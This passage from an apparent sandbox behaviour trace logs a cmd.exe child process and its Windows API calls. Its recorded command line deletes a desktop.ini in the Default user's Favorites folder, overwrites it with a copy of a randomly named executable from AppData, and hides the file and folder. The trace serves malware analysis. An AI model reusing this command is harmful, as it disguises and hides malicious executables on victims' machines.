0x1 [0214.078] _get_osfhandle (_FileHandle=1) returned 0x4c [0214.079] WriteFile (in: hFile=0x4c, lpBuffer=0x2af288*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x2ae2dc, lpOverlapped=0x0 | out: lpBuffer=0x2af288*, lpNumberOfBytesWritten=0x2ae2dc*=0x50, lpOverlapped=0x0) returned 1 [0214.079] _get_osfhandle (_FileHandle=1) returned 0x4c [0214.079] GetFileType (hFile=0x4c) returned 0x1 [0214.079] _get_osfhandle (_FileHandle=1) returned 0x4c [0214.079] WriteFile (in: hFile=0x4c, lpBuffer=0x2af2d8*, nNumberOfBytesToWrite=0x20, lpNumberOfBytesWritten=0x2ae2dc, lpOverlapped=0x0 | out: lpBuffer=0x2af2d8*, lpNumberOfBytesWritten=0x2ae2dc*=0x20, lpOverlapped=0x0) returned 1 [0214.079] _get_osfhandle (_FileHandle=4) returned 0x54 [0214.079] SetFilePointerEx (in: hFile=0x54, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2ae2c8 | out: lpNewFilePointer=0x0) returned 1 [0214.079] _get_osfhandle (_FileHandle=4) returned 0x54 [0214.079] ReadFile (in: hFile=0x54, lpBuffer=0x2af0f8, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x2ae2e8, lpOverlapped=0x0 | out: lpBuffer=0x2af0f8*, lpNumberOfBytesRead=0x2ae2e8*=0x32, lpOverlapped=0x0) returned 1 [0214.079] _get_osfhandle (_FileHandle=1) returned 0x4c [0214.079] GetFileType (hFile=0x4c) returned 0x1 [0214.079] _get_osfhandle (_FileHandle=1) returned 0x4c [0214.079] GetFileType (hFile=0x4c) returned 0x1 [0214.079] _get_osfhandle (_FileHandle=1) returned 0x4c [0214.079] WriteFile (in: hFile=0x4c, lpBuffer=0x2af0f8*, nNumberOfBytesToWrite=0x32, lpNumberOfBytesWritten=0x2ae2dc, lpOverlapped=0x0 | out: lpBuffer=0x2af0f8*, lpNumberOfBytesWritten=0x2ae2dc*=0x32, lpOverlapped=0x0) returned 1 [0214.079] _get_osfhandle (_FileHandle=4) returned 0x54 [0214.079] SetFilePointerEx (in: hFile=0x54, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2ae2c8 | out: lpNewFilePointer=0x0) returned 1 [0214.079] _close (_FileHandle=4) returned 0 [0214.080] FindNextFileW (in: hFindFile=0x3e0e78, lpFindFileData=0x2af35c | out: lpFindFileData=0x2af35c) returned 0 [0214.080] GetLastError () returned 0x12 [0214.080] FindClose (in: hFindFile=0x3e0e78 | out: hFindFile=0x3e0e78) returned 1 [0214.080] _dup2 (_FileHandleSrc=3, _FileHandleDst=1) returned 0 [0214.081] _close (_FileHandle=3) returned 0 [0214.081] _get_osfhandle (_FileHandle=1) returned 0x7 [0214.081] SetConsoleMode (hConsoleHandle=0x7, dwMode=0x3) returned 1 [0214.081] _get_osfhandle (_FileHandle=1) returned 0x7 [0214.081] GetConsoleMode (in: hConsoleHandle=0x7, lpMode=0x4a9e41ac | out: lpMode=0x4a9e41ac) returned 1 [0214.081] _get_osfhandle (_FileHandle=0) returned 0x3 [0214.082] GetConsoleMode (in: hConsoleHandle=0x3, lpMode=0x4a9e41b0 | out: lpMode=0x4a9e41b0) returned 1 [0214.082] SetConsoleInputExeNameW () returned 0x1 [0214.082] GetConsoleOutputCP () returned 0x1b5 [0214.082] GetCPInfo (in: CodePage=0x1b5, lpCPInfo=0x4a9e4260 | out: lpCPInfo=0x4a9e4260) returned 1 [0214.082] SetThreadUILanguage (LangId=0x0) returned 0x409 [0214.082] exit (_Code=0) Process: id = "530" image_name = "cmd.exe" filename = "c:\\windows\\system32\\cmd.exe" page_root = "0x7ea16860" os_pid = "0xa74" os_integrity_level = "0x3000" os_privileges = "0x60800000" monitor_reason = "child_process" parent_id = "9" os_parent_pid = "0xaec" cmd_line = "\"C:\\Windows\\system32\\cmd.exe\" /C attrib -r -s -h \"C:\\Users\\Default\\FAVORI~1\\MSNWEB~1\\desktop.ini\" & del /f /q \"C:\\Users\\Default\\FAVORI~1\\MSNWEB~1\\desktop.ini\" & type \"C:\\Users\\EEBsYm5\\AppData\\Roaming\\VMFCCE~1\\XEY8d7zI.exe\" > \"C:\\Users\\Default\\FAVORI~1\\MSNWEB~1\\desktop.ini\" && attrib +h \"C:\\Users\\Default\\FAVORI~1\\MSNWEB~1\\desktop.ini\" && attrib +h \"C:\\Users\\Default\\FAVORI~1\\MSNWEB~1\"" cur_dir = "C:\\Users\\EEBsYm5\\Desktop\\" os_username = "CRH2YWU7\\EEBsYm5" os_groups = "CRH2YWU7\\Domain Users" [0x7], "Everyone" [0x7], "BUILTIN\\Administrators" [0xf], "BUILTIN\\Users" [0x7], "NT AUTHORITY\\INTERACTIVE" [0x7], "CONSOLE LOGON" [0x7], "NT AUTHORITY\\Authenticated Users" [0x7], "NT AUTHORITY\\This Organization" [0x7], "NT AUTHORITY\\Logon Session 00000000:0000ea01" [0xc0000007], "LOCAL" [0x7], "NT AUTHORITY\\NTLM Authentication" [0x7] Region: id = 31449 start_va = 0x10000 end_va = 0x2ffff entry_point = 0x0 region_type = private name = "private_0x0000000000010000" filename = "" Region: id = 31450 start_va = 0x30000 end_va = 0x33fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000030000" filename = "" Region: id = 31451 start_va = 0x40000 end_va = 0x40fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000040000" filename = "" Region: id = 31452 start_va = 0x150000 end_va = 0x24ffff entry_point = 0x0 region_type = private name = "private_0x0000000000150000" filename = "" Region: id = 31453 start_va = 0x4a9c0000 end_va = 0x4aa0bfff entry_point = 0x4a9c0000 region_type = mapped_file name = "cmd.exe" filename = "\\Windows\\System32\\cmd.exe" (normalized: "c:\\windows\\system32\\cmd.exe") Region: id = 31454 start_va = 0x77230000 end_va = 0x7736bfff entry_point = 0x77230000 region_type = mapped_file name = "ntdll.dll" filename = "\\Windows\\System32\\ntdll.dll" (normalized: "c:\\windows\\system32\\ntdll.dll") Region: id = 31455 start_va = 0x77470000 end_va = 0x77470fff entry_point = 0x77470000 region_type = mapped_file name = "apisetschema.dll" filename = "\\Windows\\System32\\apisetschema.dll" (normalized: "c:\\windows\\system32\\apisetschema.dll") Region: id = 31456 start_va = 0x7ffb0000 end_va = 0x7ffd2fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x000000007ffb0000" filename = "" Region: id = 31457 start_va = 0x7ffd7000 end_va = 0x7ffd7fff entry_point = 0x0 region_type = private name = "private_0x000000007ffd7000" filename = "" Region: id = 31458 start_va = 0x7ffdf000 end_va = 0x7ffdffff entry_point = 0x0 region_type = private name = "private_0x000000007ffdf000" filename = "" Region: id = 31555 start_va = 0x10000 end_va = 0x1ffff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000010000" filename = "" Region: id = 31556 start_va = 0x20000 end_va = 0x2ffff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000020000" filename = "" Region: id = 31557 start_va = 0x50000 end_va = 0xb6fff entry_point = 0x50000 region_type = mapped_file name = "locale.nls" filename = "\\Windows\\System32\\locale.nls" (normalized: "c:\\windows\\system32\\locale.nls") Region: id = 31558 start_va = 0x130000 end_va = 0x13ffff entry_point = 0x0 region_type = private name = "private_0x0000000000130000" filename = "" Region: id = 31559 start_va = 0x270000 end_va = 0x36ffff entry_point = 0x0 region_type = private name = "private_0x0000000000270000" filename = "" Region: id = 31560 start_va = 0x6ee80000 end_va = 0x6ee86fff entry_point = 0x6ee80000 region_type = mapped_file name = "winbrand.dll" filename = "\\Windows\\System32\\winbrand.dll" (normalized: "c:\\windows\\system32\\winbrand.dll") Region: id = 31561 start_va = 0x75540000 end_va = 0x75589fff entry_point = 0x75540000 region_type = mapped_file name = "kernelbase.dll" filename = "\\Windows\\System32\\KernelBase.dll" (normalized: "c:\\windows\\system32\\kernelbase.dll") Region: id = 31562 start_va = 0x76480000 end_va = 0x76489fff entry_point = 0x76480000 region_type = mapped_file name = "lpk.dll" filename = "\\Windows\\System32\\lpk.dll" (normalized: "c:\\windows\\system32\\lpk.dll") Region: id = 31563 start_va = 0x76910000 end_va = 0x769e3fff entry_point = 0x76910000 region_type = mapped_file name = "kernel32.dll" filename = "\\Windows\\System32\\kernel32.dll" (normalized: "c:\\windows\\system32\\kernel32.dll") Region: id = 31564 start_va = 0x76a90000 end_va = 0x76b3bfff entry_point = 0x76a90000 region_type = mapped_file name = "msvcrt.dll" filename = "\\Windows\\System32\\msvcrt.dll" (normalized: "c:\\windows\\system32\\msvcrt.dll") Region: id = 31565 start_va = 0x76b40000 end_va = 0x76c08fff entry_point = 0x76b40000 region_type = mapped_file name = "user32.dll" filename = "\\Windows\\System32\\user32.dll" (normalized: "c:\\windows\\system32\\user32.dll") Region: id = 31566 start_va = 0x76d70000 end_va = 0x76e0cfff entry_point = 0x76d70000 region_type = mapped_file name = "usp10.dll" filename = "\\Windows\\System32\\usp10.dll" (normalized: "c:\\windows\\system32\\usp10.dll") Region: id = 31567 start_va = 0x773e0000 end_va = 0x7742dfff entry_point = 0x773e0000 region_type = mapped_file name = "gdi32.dll" filename = "\\Windows\\System32\\gdi32.dll" (normalized: "c:\\windows\\system32\\gdi32.dll") Region: id = 31568 start_va = 0x7f6f0000 end_va = 0x7f7effff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x000000007f6f0000" filename = "" Region: id = 31569 start_va = 0x370000 end_va = 0x437fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000370000" filename = "" Region: id = 31570 start_va = 0x76490000 end_va = 0x764aefff entry_point = 0x76490000 region_type = mapped_file name = "imm32.dll" filename = "\\Windows\\System32\\imm32.dll" (normalized: "c:\\windows\\system32\\imm32.dll") Region: id = 31571 start_va = 0x76ca0000 end_va = 0x76d6bfff entry_point = 0x76ca0000 region_type = mapped_file name = "msctf.dll" filename = "\\Windows\\System32\\msctf.dll" (normalized: "c:\\windows\\system32\\msctf.dll") Region: id = 31572 start_va = 0xc0000 end_va = 0xc6fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000000c0000" filename = "" Region: id = 31573 start_va = 0xd0000 end_va = 0xd1fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000000d0000" filename = "" Region: id = 31574 start_va = 0xe0000 end_va = 0xe0fff entry_point = 0x0 region_type = private name = "private_0x00000000000e0000" filename = "" Region: id = 31575 start_va = 0xf0000 end_va = 0xf0fff entry_point = 0x0 region_type = private name = "private_0x00000000000f0000" filename = "" Region: id = 31576 start_va = 0x440000 end_va = 0x540fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000440000" filename = "" Region: id = 31577 start_va = 0x550000 end_va = 0x114ffff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000550000" filename = "" Region: id = 31578 start_va = 0x1150000 end_va = 0x12b2fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000001150000" filename = "" Region: id = 31603 start_va = 0x12c0000 end_va = 0x158efff entry_point = 0x12c0000 region_type = mapped_file name = "sortdefault.nls" filename = "\\Windows\\Globalization\\Sorting\\SortDefault.nls" (normalized: "c:\\windows\\globalization\\sorting\\sortdefault.nls") Thread: id = 731 os_tid = 0x794 [0213.859] GetSystemTimeAsFileTime (in: lpSystemTimeAsFileTime=0x24fea4 | out: lpSystemTimeAsFileTime=0x24fea4*(dwLowDateTime=0xb4482280, dwHighDateTime=0x1d440a9)) [0213.859] GetCurrentProcessId () returned 0xa74 [0213.859] GetCurrentThreadId () returned 0x794 [0213.859] GetTickCount () returned 0x3bebc [0213.859] QueryPerformanceCounter (in: lpPerformanceCount=0x24fe9c | out: lpPerformanceCount=0x24fe9c*=27064871307) returned 1 [0213.860] GetModuleHandleA (lpModuleName=0x0) returned 0x4a9c0000 [0213.861] __set_app_type (_Type=0x1) [0213.861] __p__fmode () returned 0x76b331f4 [0213.861] __p__commode () returned 0x76b331fc [0213.861] SetUnhandledExceptionFilter (lpTopLevelExceptionFilter=0x4a9e21a6) returned 0x0 [0213.861] __getmainargs (in: _Argc=0x4a9e4238, _Argv=0x4a9e4240, _Env=0x4a9e423c, _DoWildCard=0, _StartInfo=0x4a9e4140 | out: _Argc=0x4a9e4238, _Argv=0x4a9e4240, _Env=0x4a9e423c) returned 0 [0213.861] GetCurrentThreadId () returned 0x794 [0213.861] OpenThread (dwDesiredAccess=0x1fffff, bInheritHandle=0, dwThreadId=0x794) returned 0x38 [0213.861] GetModuleHandleW (lpModuleName="KERNEL32.DLL") returned 0x76910000 [0213.861] GetProcAddress (hModule=0x76910000, lpProcName="SetThreadUILanguage") returned 0x769624c2 [0213.861] SetThreadUILanguage (LangId=0x0) returned 0x409 [0213.862] HeapSetInformation (HeapHandle=0x0, HeapInformationClass=0x1, HeapInformation=0x0, HeapInformationLength=0x0) returned 1 [0213.862] RegOpenKeyExW (in: hKey=0x80000001, lpSubKey="Software\\Policies\\Microsoft\\Windows\\System", ulOptions=0x0, samDesired=0x20019, phkResult=0x24fe34 | out: phkResult=0x24fe34*=0x0) returned 0x2 [0213.862] VirtualQuery (in: lpAddress=0x24fe6b, lpBuffer=0x24fe04, dwLength=0x1c | out: lpBuffer=0x24fe04*(BaseAddress=0x24f000, AllocationBase=0x150000, AllocationProtect=0x4, RegionSize=0x1000, State=0x1000, Protect=0x4, Type=0x20000)) returned 0x1c [0213.862] VirtualQuery (in: lpAddress=0x150000, lpBuffer=0x24fe04, dwLength=0x1c | out: lpBuffer=0x24fe04*(BaseAddress=0x150000, AllocationBase=0x150000, AllocationProtect=0x4, RegionSize=0x1000, State=0x2000, Protect=0x0, Type=0x20000)) returned 0x1c [0213.862] VirtualQuery (in: lpAddress=0x151000, lpBuffer=0x24fe04, dwLength=0x1c | out: lpBuffer=0x24fe04*(BaseAddress=0x151000, AllocationBase=0x150000, AllocationProtect=0x4, RegionSize=0x2000, State=0x1000, Protect=0x104, Type=0x20000)) returned 0x1c [0213.862] VirtualQuery (in: lpAddress=0x153000, lpBuffer=0x24fe04, dwLength=0x1c | out: lpBuffer=0x24fe04*(BaseAddress=0x153000, AllocationBase=0x150000, AllocationProtect=0x4, RegionSize=0xfd000, State=0x1000, Protect=0x4, Type=0x20000)) returned 0x1c [0213.862] VirtualQuery (in: lpAddress=0x250000, lpBuffer=0x24fe04, dwLength=0x1c | out: lpBuffer=0x24fe04*(BaseAddress=0x250000, AllocationBase=0x0, AllocationProtect=0x0, RegionSize=0x20000, State=0x10000, Protect=0x1, Type=0x0)) returned 0x1c [0213.862] GetConsoleOutputCP () returned 0x1b5 [0213.862] GetCPInfo (in: CodePage=0x1b5, lpCPInfo=0x4a9e4260 | out: lpCPInfo=0x4a9e4260) returned 1 [0213.862] SetConsoleCtrlHandler (HandlerRoutine=0x4a9de72a, Add=1) returned 1 [0213.862] _get_osfhandle (_FileHandle=1) returned 0x7 [0213.862] SetConsoleMode (hConsoleHandle=0x7, dwMode=0x0) returned 1 [0213.863] _get_osfhandle (_FileHandle=1) returned 0x7 [0213.863] GetConsoleMode (in: hConsoleHandle=0x7, lpMode=0x4a9e41ac | out: lpMode=0x4a9e41ac) returned 1 [0213.863] _get_osfhandle (_FileHandle=1) returned 0x7 [0213.863] SetConsoleMode (hConsoleHandle=0x7, dwMode=0x3) returned 1 [0213.863] _get_osfhandle (_FileHandle=0) returned 0x3 [0213.863] GetConsoleMode (in: hConsoleHandle=0x3, lpMode=0x4a9e41b0 | out: lpMode=0x4a9e41b0) returned 1 [0213.863] _get_osfhandle (_FileHandle=0) returned 0x3 [0213.863] SetConsoleMode (hConsoleHandle=0x3, dwMode=0x1a7) returned 1 [0213.864] GetEnvironmentStringsW () returned 0x2804a0* [0213.864] FreeEnvironmentStringsW (penv=0x2804a0) returned 1 [0213.864] GetEnvironmentStringsW () returned 0x2804a0* [0213.864] FreeEnvironmentStringsW (penv=0x2804a0) returned 1 [0213.864] RegOpenKeyExW (in: hKey=0x80000002, lpSubKey="Software\\Microsoft\\Command Processor", ulOptions=0x0, samDesired=0x2000000, phkResult=0x24eda4 | out: phkResult=0x24eda4*=0x40) returned 0x0 [0213.864] RegQueryValueExW (in: hKey=0x40, lpValueName="DisableUNCCheck", lpReserved=0x0, lpType=0x24edac, lpData=0x24edb0, lpcbData=0x24eda8*=0x1000 | out: lpType=0x24edac*=0x0, lpData=0x24edb0*=0x50, lpcbData=0x24eda8*=0x1000) returned 0x2 [0213.864] RegQueryValueExW (in: hKey=0x40, lpValueName="EnableExtensions", lpReserved=0x0, lpType=0x24edac, lpData=0x24edb0, lpcbData=0x24eda8*=0x1000 | out: lpType=0x24edac*=0x4, lpData=0x24edb0*=0x1, lpcbData=0x24eda8*=0x4) returned 0x0 [0213.864] RegQueryValueExW (in: hKey=0x40, lpValueName="DelayedExpansion", lpReserved=0x0, lpType=0x24edac, lpData=0x24edb0, lpcbData=0x24eda8*=0x1000 | out: lpType=0x24edac*=0x0, lpData=0x24edb0*=0x1, lpcbData=0x24eda8*=0x1000) returned 0x2 [0213.864] RegQueryValueExW (in: hKey=0x40, lpValueName="DefaultColor", lpReserved=0x0, lpType=0x24edac, lpData=0x24edb0, lpcbData=0x24eda8*=0x1000 | out: lpType=0x24edac*=0x4, lpData=0x24edb0*=0x0, lpcbData=0x24eda8*=0x4) returned 0x0 [0213.864] RegQueryValueExW (in: hKey=0x40, lpValueName="CompletionChar", lpReserved=0x0, lpType=0x24edac, lpData=0x24edb0, lpcbData=0x24eda8*=0x1000 | out: lpType=0x24edac*=0x4, lpData=0x24edb0*=0x40, lpcbData=0x24eda8*=0x4) returned 0x0 [0213.864] RegQueryValueExW (in: hKey=0x40, lpValueName="PathCompletionChar", lpReserved=0x0, lpType=0x24edac, lpData=0x24edb0, lpcbData=0x24eda8*=0x1000 | out: lpType=0x24edac*=0x4, lpData=0x24edb0*=0x40, lpcbData=0x24eda8*=0x4) returned 0x0 [0213.865] RegQueryValueExW (in: hKey=0x40, lpValueName="AutoRun", lpReserved=0x0, lpType=0x24edac, lpData=0x24edb0, lpcbData=0x24eda8*=0x1000 | out: lpType=0x24edac*=0x0, lpData=0x24edb0*=0x40, lpcbData=0x24eda8*=0x1000) returned 0x2 [0213.865] RegCloseKey (hKey=0x40) returned 0x0 [0213.865] RegOpenKeyExW (in: hKey=0x80000001, lpSubKey="Software\\Microsoft\\Command Processor", ulOptions=0x0, samDesired=0x2000000, phkResult=0x24eda4 | out: phkResult=0x24eda4*=0x40) returned 0x0 [0213.865] RegQueryValueExW (in: hKey=0x40, lpValueName="DisableUNCCheck", lpReserved=0x0, lpType=0x24edac, lpData=0x24edb0, lpcbData=0x24eda8*=0x1000 | out: lpType=0x24edac*=0x0, lpData=0x24edb0*=0x40, lpcbData=0x24eda8*=0x1000) returned 0x2 [0213.865] RegQueryValueExW (in: hKey=0x40, lpValueName="EnableExtensions", lpReserved=0x0, lpType=0x24edac, lpData=0x24edb0, lpcbData=0x24eda8*=0x1000 | out: lpType=0x24edac*=0x4, lpData=0x24edb0*=0x1, lpcbData=0x24eda8*=0x4) returned 0x0 [0213.865] RegQueryValueExW (in: hKey=0x40, lpValueName="DelayedExpansion", lpReserved=0x0, lpType=0x24edac, lpData=0x24edb0, lpcbData=0x24eda8*=0x1000 | out: lpType=0x24edac*=0x0, lpData=0x24edb0*=0x1, lpcbData=0x24eda8*=0x1000) returned 0x2 [0213.865] RegQueryValueExW (in: hKey=0x40, lpValueName="DefaultColor", lpReserved=0x0, lpType=0x24edac, lpData=0x24edb0, lpcbData=0x24eda8*=0x1000 | out: lpType=0x24edac*=0x4, lpData=0x24edb0*=0x0, lpcbData=0x24eda8*=0x4) returned 0x0 [0213.865] RegQueryValueExW (in: hKey=0x40, lpValueName="CompletionChar", lpReserved=0x0, lpType=0x24edac, lpData=0x24edb0, lpcbData=0x24eda8*=0x1000 | out: lpType=0x24edac*=0x4, lpData=0x24edb0*=0x9, lpcbData=0x24eda8*=0x4) returned 0x0 [0213.865] RegQueryValueExW (in: hKey=0x40, lpValueName="PathCompletionChar", lpReserved=0x0, lpType=0x24edac, lpData=0x24edb0, lpcbData=0x24eda8*=0x1000 | out: lpType=0x24edac*=0x4, lpData=0x24edb0*=0x9, lpcbData=0x24eda8*=0x4) returned 0x0 [0213.865] RegQueryValueExW (in: hKey=0x40, lpValueName="AutoRun", lpReserved=0x0, lpType=0x24edac, lpData=0x24edb0, lpcbData=0x24eda8*=0x1000 | out: lpType=0x24edac*=0x0, lpData=0x24edb0*=0x9, lpcbData=0x24eda8*=0x1000) returned 0x2 [0213.865] RegCloseKey (hKey=0x40) returned 0x0 [0213.865] time (in: timer=0x0 | out: timer=0x0) returned 0x5b8863af [0213.865] srand (_Seed=0x5b8863af) [0213.865] GetCommandLineW () returned="\"C:\\Windows\\system32\\cmd.exe\" /C attrib -r -s -h \"C:\\Users\\Default\\FAVORI~1\\MSNWEB~1\\desktop.ini\" & del /f /q \"C:\\Users\\Default\\FAVORI~1\\MSNWEB~1\\desktop.ini\" & type \"C:\\Users\\EEBsYm5\\AppData\\Roaming\\VMFCCE~1\\XEY8d7zI.exe\" > \"C:\\Users\\Default\\FAVORI~1\\MSNWEB~1\\desktop.ini\" && attrib +h \"C:\\Users\\Default\\FAVORI~1\\MSNWEB~1\\desktop.ini\" && attrib +h \"C:\\Users\\Default\\FAVORI~1\\MSNWEB~1\"" [0213.865] GetCommandLineW () returned="\"C:\\Windows\\system32\\cmd.exe\" /C attrib -r -s -h \"C:\\Users\\Default\\FAVORI~1\\MSNWEB~1\\desktop.ini\" & del /f /q \"C:\\Users\\Default\\FAVORI~1\\MSNWEB~1\\desktop.ini\" & type \"C:\\Users\\EEBsYm5\\AppData\\Roaming\\VMFCCE~1\\XEY8d7zI.exe\" > \"C:\\Users\\Default\\FAVORI~1\\MSNWEB~1\\desktop.ini\" && attrib +h \"C:\\Users\\Default\\FAVORI~1\\MSNWEB~1\\desktop.ini\" && attrib +h \"C:\\Users\\Default\\FAVORI~1\\MSNWEB~1\"" [0213.866] GetCurrentDirectoryW (in: nBufferLength=0x104, lpBuffer=0x4a9e5260 | out: lpBuffer="C:\\Users\\EEBsYm5\\Desktop") returned 0x18 [0213.866] GetModuleFileNameW (in: hModule=0x0, lpFilename=0x281c00, nSize=0x104 | out: lpFilename="C:\\Windows\\system32\\cmd.exe" (normalized: "c:\\windows\\system32\\cmd.exe")) returned 0x1b [0213.866] GetEnvironmentVariableW (in: lpName="PATH", lpBuffer=0x4a9f0640, nSize=0x2000 | out: lpBuffer="C:\\Windows\\system32;C:\\Windows;C:\\Windows\\System32\\Wbem;C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\") returned 0x63 [0213.866] GetEnvironmentVariableW (in: lpName="PATHEXT", lpBuffer=0x4a9f0640, nSize=0x2000 | out: lpBuffer=".COM;.EXE;.BAT;.CMD;.VBS;.VBE;.JS;.JSE;.WSF;.WSH;.MSC") returned 0x35 [0213.866] GetEnvironmentVariableW (in: lpName="PROMPT", lpBuffer=0x4a9f0640, nSize=0x2000 | out: lpBuffer="") returned 0x0 [0213.866] _wcsicmp (_String1="PROMPT", _String2="CD") returned 13 [0213.866] _wcsicmp (_String1="PROMPT", _String2="ERRORLEVEL") returned 11 [0213.866] _wcsicmp (_String1="PROMPT", _String2="CMDEXTVERSION") returned 13 [0213.866] _wcsicmp (_String1="PROMPT", _String2="CMDCMDLINE") returned 13 [0213.866] _wcsicmp (_String1="PROMPT", _String2="DATE") returned 12 [0213.867] _wcsicmp (_String1="PROMPT", _String2="TIME") returned -4 [0213.867] _wcsicmp (_String1="PROMPT", _String2="RANDOM") returned -2 [0213.867] _wcsicmp (_String1="PROMPT", _String2="HIGHESTNUMANODENUMBER") returned 8 [0213.867] SetEnvironmentVariableW (lpName="PROMPT", lpValue="$P$G") returned 1 [0213.867] GetEnvironmentStringsW () returned 0x2825f0* [0213.867] FreeEnvironmentStringsW (penv=0x2825f0) returned 1 [0213.867] GetEnvironmentVariableW (in: lpName="COMSPEC", lpBuffer=0x4a9f0640, nSize=0x2000 | out: lpBuffer="C:\\Windows\\system32\\cmd.exe") returned 0x1b [0213.867] GetEnvironmentVariableW (in: lpName="KEYS", lpBuffer=0x4a9f0640, nSize=0x2000 | out: lpBuffer="") returned 0x0 [0213.867] _wcsicmp (_String1="KEYS", _String2="CD") returned 8 [0213.867] _wcsicmp (_String1="KEYS", _String2="ERRORLEVEL") returned 6 [0213.867] _wcsicmp (_String1="KEYS", _String2="CMDEXTVERSION") returned 8 [0213.867] _wcsicmp (_String1="KEYS", _String2="CMDCMDLINE") returned 8 [0213.867] _wcsicmp (_String1="KEYS", _String2="DATE") returned 7 [0213.867] _wcsicmp (_String1="KEYS", _String2="TIME") returned -9 [0213.867] _wcsicmp (_String1="KEYS", _String2="RANDOM") returned -7 [0213.867] _wcsicmp (_String1="KEYS", _String2="HIGHESTNUMANODENUMBER") returned 3 [0213.867] GetCurrentDirectoryW (in: nBufferLength=0x104, lpBuffer=0x24fb70 | out: lpBuffer="C:\\Users\\EEBsYm5\\Desktop") returned 0x18 [0213.867] GetFullPathNameW (in: lpFileName="C:\\Users\\EEBsYm5\\Desktop", nBufferLength=0x104, lpBuffer=0x24fb70, lpFilePart=0x24fb6c | out: lpBuffer="C:\\Users\\EEBsYm5\\Desktop", lpFilePart=0x24fb6c*="Desktop") returned 0x18 [0213.867] GetFileAttributesW (lpFileName="C:\\Users\\EEBsYm5\\Desktop" (normalized: "c:\\users\\eebsym5\\desktop")) returned 0x11 [0213.868] FindFirstFileW (in: lpFileName="C:\\Users", lpFindFileData=0x24f8ec | out: lpFindFileData=0x24f8ec) returned 0x280c80 [0213.868] FindClose (in: hFindFile=0x280c80 | out: hFindFile=0x280c80) returned 1 [0213.868] FindFirstFileW (in: lpFileName="C:\\Users\\EEBsYm5", lpFindFileData=0x24f8ec | out: lpFindFileData=0x24f8ec) returned 0x280c80 [0213.868] FindClose (in: hFindFile=0x280c80 | out: hFindFile=0x280c80) returned 1 [0213.868] FindFirstFileW (in: lpFileName="C:\\Users\\EEBsYm5\\Desktop", lpFindFileData=0x24f8ec | out: lpFindFileData=0x24f8ec) returned 0x280c80 [0213.868] FindClose (in: hFindFile=0x280c80 | out: hFindFile=0x280c80) returned 1 [0213.869] GetFileAttributesW (lpFileName="C:\\Users\\EEBsYm5\\Desktop" (normalized: "c:\\users\\eebsym5\\desktop")) returned 0x11 [0213.869] SetCurrentDirectoryW (lpPathName="C:\\Users\\EEBsYm5\\Desktop" (normalized: "c:\\users\\eebsym5\\desktop")) returned 1 [0213.869] SetEnvironmentVariableW (lpName="=C:", lpValue="C:\\Users\\EEBsYm5\\Desktop") returned 1 [0213.869] GetEnvironmentStringsW () returned 0x2804a0* [0213.869] FreeEnvironmentStringsW (penv=0x2804a0) returned 1 [0213.869] GetCurrentDirectoryW (in: nBufferLength=0x104, lpBuffer=0x4a9e5260 | out: lpBuffer="C:\\Users\\EEBsYm5\\Desktop") returned 0x18 [0213.870] GetConsoleOutputCP () returned 0x1b5 [0213.870] GetCPInfo (in: CodePage=0x1b5, lpCPInfo=0x4a9e4260 | out: lpCPInfo=0x4a9e4260) returned 1 [0213.870] GetUserDefaultLCID () returned 0x409 [0213.870] GetLocaleInfoW (in: Locale=0x409, LCType=0x1e, lpLCData=0x4a9e4950, cchData=8 | out: lpLCData=":") returned 2 [0213.870] GetLocaleInfoW (in: Locale=0x409, LCType=0x23, lpLCData=0x24fcb0, cchData=128 | out: lpLCData="0") returned 2 [0213.870] GetLocaleInfoW (in: Locale=0x409, LCType=0x21, lpLCData=0x24fcb0, cchData=128 | out: lpLCData="0") returned 2 [0213.870] GetLocaleInfoW (in: Locale=0x409, LCType=0x24, lpLCData=0x24fcb0, cchData=128 | out: lpLCData="1") returned 2 [0213.870] GetLocaleInfoW (in: Locale=0x409, LCType=0x1d, lpLCData=0x4a9e4940, cchData=8 | out: lpLCData="/") returned 2 [0213.870] GetLocaleInfoW (in: Locale=0x409, LCType=0x31, lpLCData=0x4a9e4d80, cchData=32 | out: lpLCData="Mon") returned 4 [0213.871] GetLocaleInfoW (in: Locale=0x409, LCType=0x32, lpLCData=0x4a9e4d40, cchData=32 | out: lpLCData="Tue") returned 4 [0213.871] GetLocaleInfoW (in: Locale=0x409, LCType=0x33, lpLCData=0x4a9e4d00, cchData=32 | out: lpLCData="Wed") returned 4 [0213.871] GetLocaleInfoW (in: Locale=0x409, LCType=0x34, lpLCData=0x4a9e4cc0, cchData=32 | out: lpLCData="Thu") returned 4 [0213.871] GetLocaleInfoW (in: Locale=0x409, LCType=0x35, lpLCData=0x4a9e4c80, cchData=32 | out: lpLCData="Fri") returned 4 [0213.871] GetLocaleInfoW (in: Locale=0x409, LCType=0x36, lpLCData=0x4a9e4c40, cchData=32 | out: lpLCData="Sat") returned 4 [0213.871] GetLocaleInfoW (in: Locale=0x409, LCType=0x37, lpLCData=0x4a9e4c00, cchData=32 | out: lpLCData="Sun") returned 4 [0213.871] GetLocaleInfoW (in: Locale=0x409, LCType=0xe, lpLCData=0x4a9e4930, cchData=8 | out: lpLCData=".") returned 2 [0213.871] GetLocaleInfoW (in: Locale=0x409, LCType=0xf, lpLCData=0x4a9e4920, cchData=8 | out: lpLCData=",") returned 2 [0213.871] setlocale (category=0, locale=".OCP") returned="English_United States.437" [0213.872] GetConsoleTitleW (in: lpConsoleTitle=0x270ac8, nSize=0x104 | out: lpConsoleTitle="C:\\Windows\\system32\\cmd.exe") returned 0x1b [0213.872] GetModuleHandleW (lpModuleName="KERNEL32.DLL") returned 0x76910000 [0213.872] GetProcAddress 